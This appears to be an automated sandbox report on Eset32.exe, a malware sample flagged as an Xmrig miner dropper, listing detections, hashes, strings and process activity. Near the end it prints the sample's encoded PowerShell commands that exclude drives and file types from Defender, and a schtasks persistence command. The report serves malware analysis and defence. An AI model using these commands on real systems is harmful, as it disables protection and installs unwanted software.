Windows Analysis Report
Eset32.exe

Overview

General Information

Sample Name:	Eset32.exe
Analysis ID:	596584
MD5:	b405bf6533c047b1a47ceced3b42c23b
SHA1:	bbb321d380c3f9d17e49a9f2167234742e292e4d
SHA256:	5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Writes to foreign memory regions

Found strings related to Crypto-Mining

.NET source code references suspicious native API functions

Encrypted powershell cmdline option found

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains method to dynamically call methods (often used by packers)

Machine Learning detection for dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Potential dropper URLs found in powershell memory

PE file contains section with special chars

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Drops PE files

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sigma detected: Suspicious Execution of Powershell with Base64

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Eset32.exe	Virustotal: Detection: 63%	Perma Link
Source: Eset32.exe	Metadefender: Detection: 14%	Perma Link
Source: Eset32.exe	ReversingLabs: Detection: 59%

Antivirus / Scanner detection for submitted sample

Source: Eset32.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe

Avira: detection malicious, Label: HEUR/AGEN.1235806

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\1.exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Roaming\1.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\12.exe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Roaming\12.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	Virustotal: Detection: 29%	Perma Link
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	ReversingLabs: Detection: 73%

Machine Learning detection for sample

Source: Eset32.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\12.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 26.2.System.exe.18691d78.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.System.exe.18691d78.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://-:x@exit:0
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://-:x@exit:0

Uses 32bit PE files

Source: Eset32.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Eset32.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: 1.exe, 00000004.00000003.433262708.0000000002612000.00000040.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.433791167.0000000000114000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Eset32.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\Eset32.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\Eset32.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,SHELL32_IconCache_DoneExtractingIcons,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF

Networking

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

DNS query: name: ip-api.com

Potential dropper URLs found in powershell memory

Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuerymati
Source: powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: powershell.exe, 0000000A.00000002.514065308.0000021AAB7E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624575236.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000003.622068168.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679127744.000002BE88776000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000003.671831043.000002BE88776000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001E.00000002.634745548.0000024FA5AC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708582880.0000000006C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com4
Source: Eset32.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Eset32.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.entrust.net02
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 12.exe, 00000001.00000002.552111888.0000000003495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.501374621.0000021A936C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624837713.0000024F8D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679354335.000002BE88901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.entrust.net/rpa0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.entrust.net/rpa03
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jsonrpc.org/
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/openwall/john/issues/3454#issuecomment-436899959
Source: powershell.exe, 0000000A.00000002.510560064.0000021A948A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511051451.0000021A94B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511415597.0000021A94D18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://pidgin.im0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Eset32.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

System Summary

PE file contains section with special chars

Source: 1.exe.0.dr

Static PE information: section name: .5{mr

Uses 32bit PE files

Source: Eset32.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Eset32.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Detected potential crypto function

Source: C:\Users\user\Desktop\Eset32.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\Eset32.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09BE5C2	1_2_00007FF9F09BE5C2
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09BD816	1_2_00007FF9F09BD816
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B8574	1_2_00007FF9F09B8574
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B0571	1_2_00007FF9F09B0571
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B1599	1_2_00007FF9F09B1599
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B1508	1_2_00007FF9F09B1508
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B0515	1_2_00007FF9F09B0515
Source: C:\Users\user\AppData\Roaming\12.exe	Code function: 1_2_00007FF9F09B2BC9	1_2_00007FF9F09B2BC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C1464	6_2_069C1464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069CDEE0	6_2_069CDEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069CBF80	6_2_069CBF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C1DA0	6_2_069C1DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C7D70	6_2_069C7D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C0B40	6_2_069C0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069CC850	6_2_069CC850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C0868	6_2_069C0868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C155D	6_2_069C155D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C20C8	6_2_069C20C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C1E41	6_2_069C1E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069CBC38	6_2_069CBC38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C7D60	6_2_069C7D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C0B31	6_2_069C0B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_069C0B7A	6_2_069C0B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_09826E3F	6_2_09826E3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 6_2_09826E40	6_2_09826E40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B1958	10_2_00007FF9F09B1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B19E0	10_2_00007FF9F09B19E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B2C68	10_2_00007FF9F09B2C68
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C0571	22_2_00007FF9F09C0571
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C8574	22_2_00007FF9F09C8574
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C1599	22_2_00007FF9F09C1599
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C1508	22_2_00007FF9F09C1508
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C0515	22_2_00007FF9F09C0515
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Code function: 22_2_00007FF9F09C2BC9	22_2_00007FF9F09C2BC9

PE file does not import any functions

Source: 12.exe.0.dr	Static PE information: No import functions for PE file found
Source: sihost64.exe.26.dr	Static PE information: No import functions for PE file found
Source: System.exe.1.dr	Static PE information: No import functions for PE file found

Source: Eset32.exe	Virustotal: Detection: 63%
Source: Eset32.exe	Metadefender: Detection: 14%
Source: Eset32.exe	ReversingLabs: Detection: 59%

Source: C:\Users\user\Desktop\Eset32.exe

File read: C:\Users\user\Desktop\Eset32.exe

Source: unknown	Process created: C:\Users\user\Desktop\Eset32.exe "C:\Users\user\Desktop\Eset32.exe"
Source: C:\Users\user\Desktop\Eset32.exe	Process created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exe
Source: C:\Users\user\Desktop\Eset32.exe	Process created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exe
Source: C:\Users\user\AppData\Roaming\1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
